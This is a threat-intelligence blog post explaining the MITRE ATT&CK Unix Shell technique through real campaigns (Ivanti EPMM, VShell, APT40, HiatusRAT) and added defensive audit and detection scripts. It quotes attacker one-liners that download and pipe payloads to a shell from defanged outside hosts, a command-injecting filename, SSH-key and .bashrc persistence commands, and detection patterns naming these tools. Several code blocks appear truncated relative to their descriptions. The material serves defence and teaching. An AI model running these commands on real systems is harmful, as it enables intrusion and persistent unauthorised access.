T1059.004 Unix Shell in MITRE ATT&CK Explained
| March 09, 2026
What Is T1059.004 Unix Shell in MITRE ATT&CK?
T1059.004 Unix Shell is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of Unix shell environments on Unix-like operating systems to execute commands and scripts on a host.
Unix shells provide a command-line interface and scripting environment for interacting with the operating system. Common shell variants include the Bourne Shell (sh), Bourne-Again Shell (bash), Z Shell (zsh), and Korn Shell (ksh). These shells support scripting features such as variables, conditional logic, loops, and file operations, enabling automation of system tasks and program execution. This functionality is widely used for legitimate system administration and automation across Linux and Unix-based systems.
To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.
Adversary Use of T1059.004 Unix Shell
Adversaries use T1059.004 Unix Shell to execute malicious commands and scripts by abusing native shell environments commonly present on Unix-like systems. Because shells such as sh and bash are standard components of these operating systems, their use can blend into normal administrative activity and evade detection focused on non-native tools.
In attack campaigns, adversaries leverage Unix shells to run commands, execute scripts, deploy payloads, modify system configurations, and orchestrate follow-on actions such as persistence or lateral movement. Shell commands are frequently embedded within exploit chains, cron jobs, startup scripts, or remote access mechanisms, making Unix shell usage a recurring element in real-world adversary tradecraft.
Procedure Examples Used by Adversaries in Red Report 2026
Downloading and Executing Malicious Payloads
Adversaries use simple, obfuscated shell one-liners over SSH or remote shells to fetch and run payloads, establishing a foothold quickly.
In a May 21, 2025 analysis of a China-nexus actor exploiting Ivanti EPMM, operators delivered a short bash sequence that downloads a binary to /tmp/1, makes it executable, and runs it [1]:
```bash
/bin/bash -c $@|bash 0 echo wget hxxp://tnegadge[.]s3.amazonaws.com/dfuJ8t1uhG -0 /tmp/1 || curl -o /tmp/1 hxxp://tnegadge[.]s3.amazonaws.com/dfuJ8t1uhG || fetch -o /tmp/1 hxxp://tnegadge[.]s3.amazonaws.com/dfuJ8t1uhG
```
The one-liner tries multiple downloaders (wget, then curl, then fetch) so that it succeeds across Linux and BSD variants, writes the payload to a transient location (/tmp/1), and, in the steps that follow the fragment shown, sets the execute bit and runs it. The "$@|bash 0 ..." prefix is a small trick: bash -c receives $@|bash as its script and 0 as $0, so everything after that becomes positional parameters that the first shell echoes and pipes into a second bash. The real command line never appears in the -c argument itself. If the download succeeds, the host runs the attacker's binary; if every downloader fails or the file cannot be executed, the chain stops, which shows up as failed downloader processes and a missing /tmp/1.
Attackers favor this pattern because it's compact, reliable across Unix variants, and quickly establishes persistence or a backdoor for follow-on activity (credential theft, lateral movement, data exfiltration).
Defense Evasion: Execute In-Memory Payload (MITRE T1564)
Adversaries crafted malicious filenames that execute Bash code when expanded or evaluated in a shell script.
In the August 2025 threat analysis of the VShell campaign, the .rar attachment contained a file whose name embedded a Base64-encoded Bash downloader, shown here with the Base64 segment decoded [2]:
```text
ziliao2.pdf`{echo,(curl -fsSL -m180 hxxp://47[.]98[.]194[.]60:443/slw||wget -T180 -q hxxp://47[.]98[.]194[.]60:443/slw)|sh }_{base64,-d}_bash`
```
When a script processed the directory with a loop such as for f in *; do eval "echo $f"; done, eval re-parsed the filename as shell input: the backticks became a command substitution, the {echo,...} and {base64,-d} brace expansions supplied the spaces the attacker avoided putting in the name, and the decoded downloader ran, fetching a secondary Bash script from the attacker's server. A loop that passes the name as data, for example printf '%s\n' "$f", leaves it inert.
The secondary script then determined system architecture (ARCH=$(uname -m)), fetched the matching ELF loader via curl -fsSL, and launched it silently with multiple nohup fallbacks:
```bash
chmod +x $v
```
With this, the loader starts even where one nohup form is unavailable, runs in the background with no output, and never writes the decrypted VShell backdoor to disk: it executes the payload from memory with fexecve() and renames the process to look like a kernel thread ([kworker/0:2]). When the descriptor handed to fexecve() comes from memfd_create(), /proc/<pid>/exe of the resulting process points at a "/memfd:..." path marked (deleted), which is a reliable hunting artifact for this pattern; a genuine kworker thread has no executable at all.
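The unsafe loop quoted above, as an added shell example that is not part of the original post or of the Trellix report, beside the form that treats the name as data. The scratch directory and filenames are constructed here, and the command embedded in the name only creates a marker file:

```shell
#!/bin/sh
# Added example, not code from the original post or from the Trellix report:
# why a loop that evaluates untrusted filenames executes a VShell-style
# payload, and the form that does not. The scratch directory and filenames
# are constructed here; the embedded command only creates a marker file.

# Create a directory with a benign file and one whose name carries a command
# substitution. The real sample wrote {curl,...} with brace expansion so the
# name needed no spaces; a plain space is used here so the demo also runs
# under dash, which has no brace expansion.
make_sample_dir() {
  d=$(mktemp -d)
  printf 'benign\n' > "$d/report.pdf"
  : > "$d/ziliao2.pdf\`touch pwned\`"
  printf '%s\n' "$d"
}

# The pattern quoted in the post: eval re-parses the name, so the backticks
# run `touch pwned` in the directory before echo ever sees the string.
unsafe_listing() {
  ( cd "$1" && for f in *; do eval "echo $f"; done ) >/dev/null 2>&1
}

# Same listing without eval: the name is passed as data, never re-parsed.
safe_listing() {
  ( cd "$1" && for f in *; do printf '%s\n' "$f"; done )
}

# True if the side effect of the injected command is present.
marker_present() { [ -e "$1/pwned" ]; }

# Stand-alone demonstration.
DEMO=$(make_sample_dir)
safe_listing "$DEMO" >/dev/null
if marker_present "$DEMO"; then echo "marker present after safe listing (should not happen)"; fi
unsafe_listing "$DEMO"
if marker_present "$DEMO"; then echo "marker present after eval listing: the filename ran a command"; fi
rm -rf "$DEMO"
```

The safe form is not a special escaping routine; it is simply never handing a filename back to the parser. Any construct that does (eval, sh -c "$var", an unquoted backtick in a here-document) reopens the hole.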
Procedure Examples Used by Adversaries in Red Report 2025
Exploitation with SSH
In January 2024, Cisco Talos researchers disclosed multiple vulnerabilities in the OAS Engine and showed how seemingly minor, low-impact flaws can be chained for significant privilege escalation on Unix-based systems [3]. Once authenticated to the platform, an attacker can explore the filesystem for the files that govern SSH access, such as sshd_config or .ssh/authorized_keys, using commands such as:
```bash
ls -la /etc/ssh/
```
This reconnaissance shows how SSH is configured and whether public key authentication is enabled. Using the file-write capability the OAS Engine vulnerabilities expose, the attacker then appends their own SSH public key to the user's authorized_keys file, the equivalent of:
```bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEArw..." >> /home/<OAS_user>/.ssh/authorized_keys
```
This ensures persistent access, allowing them to connect via SSH:
```bash
ssh -i /path/to/private_key <OAS_user>@<target_ip>
```
With shell access established, the attacker may further manipulate configuration files, such as .bashrc or .zshrc, to modify the environment and maintain control, for example:
```bash
# Single quotes keep $PATH unexpanded in the file, so the hijack applies to
# whatever PATH a future login starts with rather than a snapshot of today's.
echo 'export PATH=/tmp/malicious_bin:$PATH' >> ~/.bashrc
```
By combining application vulnerabilities with Unix shell tools, the attacker gains elevated access and system control, highlighting the critical need for timely patching and secure configurations.
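An added example, not code from the original post or from the Talos write-up: a short audit that checks a home directory for the two artifacts this scenario leaves behind, an authorized_keys entry outside an allowlist and a PATH prepend that points at a scratch or world-writable directory. The sample home directory, keys and allowlist are constructed inside the script:

```shell
#!/bin/sh
# Added example, not code from the original post or from the Talos write-up:
# a host-side audit for the two artifacts the OAS Engine scenario leaves
# behind, an extra authorized_keys entry and a PATH prepend in a shell rc file.
# The home directory, keys and allowlist below are constructed for the demo.

# Print authorized_keys lines whose key material (type + base64 blob) is not
# in the allowlist. Leading options and the trailing comment are ignored, so
# renaming a key or adding command="..." options cannot hide it.
unknown_keys() {   # usage: unknown_keys AUTHORIZED_KEYS ALLOWLIST
  awk -v allow="$2" '
    BEGIN {
      while ((getline line < allow) > 0) {
        n = split(line, f, " ")
        if (n >= 2 && f[1] !~ /^#/) ok[f[1] " " f[2]] = 1
      }
    }
    /^[ \t]*(#|$)/ { next }
    {
      for (i = 1; i <= NF; i++) if ($i ~ /^(ssh-|ecdsa-|sk-)/) break
      if (i < NF) { key = $i " " $(i + 1); if (!(key in ok)) print }
    }' "$1"
}

# Print PATH entries from "export PATH=..." lines in an rc file that point at
# a scratch directory or at a directory anyone can write to.
hijacked_path_entries() {   # usage: hijacked_path_entries RCFILE
  grep -E '^[[:space:]]*export[[:space:]]+PATH=' "$1" | sed -e 's/^[^=]*=//' -e "s/[\"']//g" |
    tr ':' '\n' | while read -r dir; do
      case $dir in
        ''|'$PATH'|'${PATH}') ;;
        /tmp/*|/var/tmp/*|/dev/shm/*) printf '%s\n' "$dir" ;;
        *) if [ -d "$dir" ] && [ -n "$(find "$dir" -prune -perm -002 2>/dev/null)" ]; then
             printf '%s\n' "$dir"
           fi ;;
      esac
    done
}

# Build a throwaway home directory that looks like the post-compromise state.
make_sample_home() {
  h=$(mktemp -d)
  mkdir -p "$h/.ssh" "$h/world_writable"
  chmod 777 "$h/world_writable"
  # Allowlist: the one key the admin provisioned (constructed, not a real key).
  printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEADMINKEY admin@corp\n' > "$h/allowed_keys"
  # authorized_keys: the admin key plus an appended attacker key carrying options.
  cat > "$h/.ssh/authorized_keys" <<EOF
# keys managed by config management
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEADMINKEY admin@corp
no-pty,command="/bin/sh" ssh-rsa AAAAB3NzaC1yc2EEXAMPLEATTACKERKEY backup
EOF
  # .bashrc: a normal PATH line, then the hijack from the OAS scenario.
  cat > "$h/.bashrc" <<EOF
export PATH=/usr/local/bin:\$PATH
export PATH="/tmp/malicious_bin:$h/world_writable:\$PATH"
EOF
  printf '%s\n' "$h"
}

# Stand-alone demonstration.
HOME_DIR=$(make_sample_home)
echo "keys not in allowlist:"; unknown_keys "$HOME_DIR/.ssh/authorized_keys" "$HOME_DIR/allowed_keys"
echo "suspicious PATH entries:"; hijacked_path_entries "$HOME_DIR/.bashrc"
rm -rf "$HOME_DIR"
```

Run the two functions from a root cron job over every home directory plus /etc/bashrc and /etc/profile.d, and compare against a known-good key list kept outside the host; a diff that only looks at file modification times misses an attacker who resets them with touch -r.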
Impair Defenses: Modify System Firewall (T1562.004)
In another example showcased by CISA in July 2024, APT40 leverages Unix shell tools extensively to maintain access and execute commands on compromised systems [4]. After gaining initial access, the group deploys web shells, enabling arbitrary command execution through Unix shells such as bash or zsh. This provides a flexible environment for reconnaissance, credential harvesting, and lateral movement.
For instance, the actors use tools like nmap for network scanning and manipulate the host firewall with the iptables tool chain: iptables-save exports the current ruleset to a file, where it can be edited and loaded back with iptables-restore, so that the group's own listeners and tunnels stay reachable:
```bash
iptables-save >> /path/to/modified/rules
```
These actions enable persistence and facilitate exfiltration over secure or tunneled channels.
Downloading, Loading and Executing Malicious Payloads
In the CISA advisory released in February 2024, Volt Typhoon adversaries leveraged Unix Shell as part of their command and scripting interpreter techniques to maintain and expand their access within compromised environments [5]. Specifically, the Unix Shell was utilized alongside other command-line interfaces such as PowerShell and Windows Management Instrumentation (WMI), providing the attackers with a versatile and stealthy means of executing commands, managing processes, and streaming data across networks.
The advisory notes the use of tools such as Brightmetricagent.exe alongside these shells, illustrating how the group combines shell capabilities with bi-directional data streaming and remote execution to operate on compromised systems while hiding behind legitimate system processes.
Procedure Examples Used by Adversaries in Red Report 2024
File Execution
In September 2023, CISA released a malware analysis report analyzing five malware samples. One of the samples was the SUBMARINE backdoor [6].
Input (name of the file)
The file name exploits a flaw in the target environment that causes the Base64 string embedded in the name to be decoded and executed by the Linux shell [6]. The decoded commands first run chmod +x on everything matching /root/mac*, granting execute permission, and then invoke sh on everything matching /root/mach*. Running files staged under /root this way amounts to arbitrary code execution as root.
Exploitation for Credential Access
Adversaries also use Unix shell scripts to exploit a target and exfiltrate sensitive information, including valid account credentials. In July 2023, for instance, a fake proof-of-concept exploit for a Linux vulnerability was found dropping data-stealing malware on the systems of the researchers who ran it [7].
The fake PoC masquerades as an exploit for the high-severity use-after-free bug CVE-2023-35829 and uses Linux namespaces to present a fake root shell; nothing ever triggers the vulnerability, the shell merely keeps the user busy while the hidden payload runs. On launch it drops a file named kworker, adds it to /etc/bashrc so every new shell starts it, and contacts a C2 server to download a Bash script. That script steals data from /etc/passwd, appends the attacker's SSH key to ~/.ssh/authorized_keys for remote access, and exfiltrates the collected data through transfer.sh. The PoC is a trojan horse: real malware delivered under the guise of an exploit.
Exploitation for Remote Code Execution
Adversaries often leverage Unix Shell to download and execute commands on the target machine.
For instance, exploitation of CVE-2022-39952 in Fortinet's FortiNAC goes through the 'configApplianceXml' script [8]. The script unsets any alias for 'cd', changes the working directory to the filesystem root ('/'), and then calls 'unzip' on an uploaded archive ('upload.applianceKey'). Because extraction happens relative to '/', an archive entry such as etc/cron.d/payload lands in /etc/cron.d/payload, so an attacker who controls the archive can write arbitrary files anywhere on the filesystem. A cron entry dropped this way runs as root on the next scheduler tick, for example launching a reverse shell, which hands the attacker full control of the appliance.
```text
root@dev: /tmp/fnac940# cat bsc/campusgr/bin/configApplianceXml
```
Downloading, Loading and Executing Malicious Payloads
In one malware campaign reported in March 2023, attackers deployed a bash script on infected routers to download three components: the malicious HiatusRAT, a legitimate network traffic capture tool 'tcpdump,' and additional payloads [9].
The Hiatus bash script, shown in the code snippet below, runs on the compromised router and checks for a file named '.updata' in the '/database' directory. If the file exists and is executable, the script runs it; if it exists but is not executable, the script sets the execute bit and then runs it; if it does not exist, the script downloads the payload from a hard-coded URL into '.updata', sets the execute bit, and runs it. The fixed path and the chmod-then-execute step are the observables: any process writing to or executing /database/.updata is worth an alert.
```sh
#! /bin/sh
```
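The one-liners in this post share a few shapes that process telemetry can catch: the downloader fallback chain and pipe-to-shell of the Ivanti and VShell cases, the Base64 decode of the SUBMARINE filename, the fetch-then-chmod of the HiatusRAT script and the Ivanti dropper, and the writes to authorized_keys, rc files and cron.d in the OAS, fake-PoC and FortiNAC cases. The following is an added example, not code from the original post or from any cited report: a rule pass over command lines. The sample records and the example.invalid hosts are constructed for the demonstration:

```shell
#!/bin/sh
# Added example, not code from the original post or from any of the reports it
# cites: a small rule pass over process command lines, written against the
# shell-abuse patterns this post describes. The sample lines and the
# example.invalid hosts are constructed; real input would come from auditd
# EXECVE records, eBPF process telemetry or an EDR export.

# Print the space-separated rule names that match one command line.
score_cmdline() {
  cmd=$1
  hits=""
  # Two downloaders chained with || (the wget -> curl -> fetch fallback).
  printf '%s' "$cmd" | grep -Eq '(wget|curl|fetch)[^|;&]*[|][|][^|;&]*(wget|curl|fetch)' \
    && hits="$hits downloader-fallback"
  # Output piped straight into a shell: curl ... | sh, $@|bash, base64 -d | bash.
  printf '%s' "$cmd" | grep -Eq '[|][[:space:]]*(/bin/|/usr/bin/)?(ba|z|k|da)?sh([[:space:];)]|$)' \
    && hits="$hits pipe-to-shell"
  # base64 decoding on the command line (SUBMARINE and VShell both hid code this way).
  printf '%s' "$cmd" | grep -Eq 'base64[[:space:]]+(-d|--decode)' \
    && hits="$hits base64-decode"
  # A downloader and a chmod that sets an execute bit in one line: fetch, mark, run.
  printf '%s' "$cmd" | grep -Eq '(wget|curl|fetch)[[:space:]]' \
    && printf '%s' "$cmd" | grep -Eq 'chmod[[:space:]]+([ugoa]*\+[rw]*x|[0-7]*[1357][0-7]*)' \
    && hits="$hits fetch-then-chmod"
  # A file under a scratch directory being made executable.
  printf '%s' "$cmd" | grep -Eq 'chmod[[:space:]]+[^;|&]*(/tmp|/var/tmp|/dev/shm)/' \
    && hits="$hits scratch-dir-chmod"
  # Redirection into the persistence files seen in the OAS, fake-PoC and FortiNAC cases.
  printf '%s' "$cmd" | grep -Eq '>>?[[:space:]]*[^[:space:]]*(authorized_keys|\.bashrc|\.zshrc|/etc/bashrc|/etc/profile|/etc/cron\.d/)' \
    && hits="$hits persistence-write"
  printf '%s\n' "${hits# }"
}

# Constructed sample telemetry: "<pid> <argv joined by spaces>", one record per line.
SAMPLE_CMDLINES='1201 /bin/bash -c $@|bash 0 echo wget http://example.invalid/dfuJ8t1uhG -O /tmp/1 || curl -o /tmp/1 http://example.invalid/dfuJ8t1uhG || fetch -o /tmp/1 http://example.invalid/dfuJ8t1uhG; chmod +x /tmp/1; /tmp/1
1202 sh -c (curl -fsSL -m180 http://example.invalid/slw||wget -T180 -q http://example.invalid/slw)|sh
1203 bash -c echo ZWNobyBoaQ== | base64 -d | bash
1204 sh -c echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYNOTREAL attacker >> /home/oas/.ssh/authorized_keys
1205 sh -c wget -O /database/.updata http://example.invalid/.updata; chmod +x /database/.updata; /database/.updata
1206 apt-get install -y tcpdump
1207 tar czf /tmp/backup.tgz /etc/ssh'

# Run the rules over each record and print "pid<TAB>rules" for the hits.
report() {
  printf '%s\n' "$SAMPLE_CMDLINES" | while read -r pid cmd; do
    rules=$(score_cmdline "$cmd")
    if [ -n "$rules" ]; then printf '%s\t%s\n' "$pid" "$rules"; fi
  done
}

# Number of records that matched at least one rule.
hit_count() { report | wc -l | tr -d '[:space:]'; }

report
```

Each rule is deliberately narrow so it can be tuned on its own: /database/.updata is not a scratch directory, so the HiatusRAT-style record fires only fetch-then-chmod, and a line that merely writes a backup into /tmp fires nothing. Real telemetry should be scored per process tree rather than per line, since the download, the chmod and the execution usually arrive as separate execve events.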
References
[1] EclecticIQ, “China-Nexus Threat Actor Actively Exploiting Ivanti Endpoint Manager Mobile (CVE-2025-4428) Vulnerability,” May 2025. Available: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability. [Accessed: Nov. 05, 2025]
[2] Trellix Research, “The Silent Fileless Threat of VShell,” Aug. 2025. Available: https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/. [Accessed: Nov. 05, 2025]
[3] J. Rittle, “OAS Engine Deep Dive: Abusing low-impact vulnerabilities to escalate privileges,” Cisco Talos Blog, Jan. 31, 2024. Available: https://blog.talosintelligence.com/oas-engine-deep-dive/. [Accessed: Nov. 27, 2024]
[4] CISA, Cybersecurity Advisory AA24-190A (APT40), Jul. 2024. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a
[5] CISA, Cybersecurity Advisory AA24-038A (Volt Typhoon), Feb. 2024. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a
[6] CISA, Malware Analysis Report MAR-10454006.r5.v1 (SUBMARINE backdoor), Sept. 2023. Available: https://www.cisa.gov/sites/default/files/2023-09/MAR-10454006.r5.v1.CLEAR__0.pdf. [Accessed: Dec. 19, 2023]
[7] B. Toulas, “Fake Linux vulnerability exploit drops data-stealing malware,” BleepingComputer, Jul. 13, 2023. Available: https://www.bleepingcomputer.com/news/security/fake-linux-vulnerability-exploit-drops-data-stealing-malware/. [Accessed: Dec. 20, 2023]
[8] B. Toulas, “Exploit released for critical Fortinet RCE flaw, patch now,” BleepingComputer, Feb. 21, 2023. Available: https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-fortinet-rce-flaw-patch-now/. [Accessed: Dec. 20, 2023]
[9] B. Toulas, “New malware infects business routers for data theft, surveillance,” BleepingComputer, Mar. 06, 2023. Available: https://www.bleepingcomputer.com/news/security/new-malware-infects-business-routers-for-data-theft-surveillance/. [Accessed: Dec. 20, 2023]
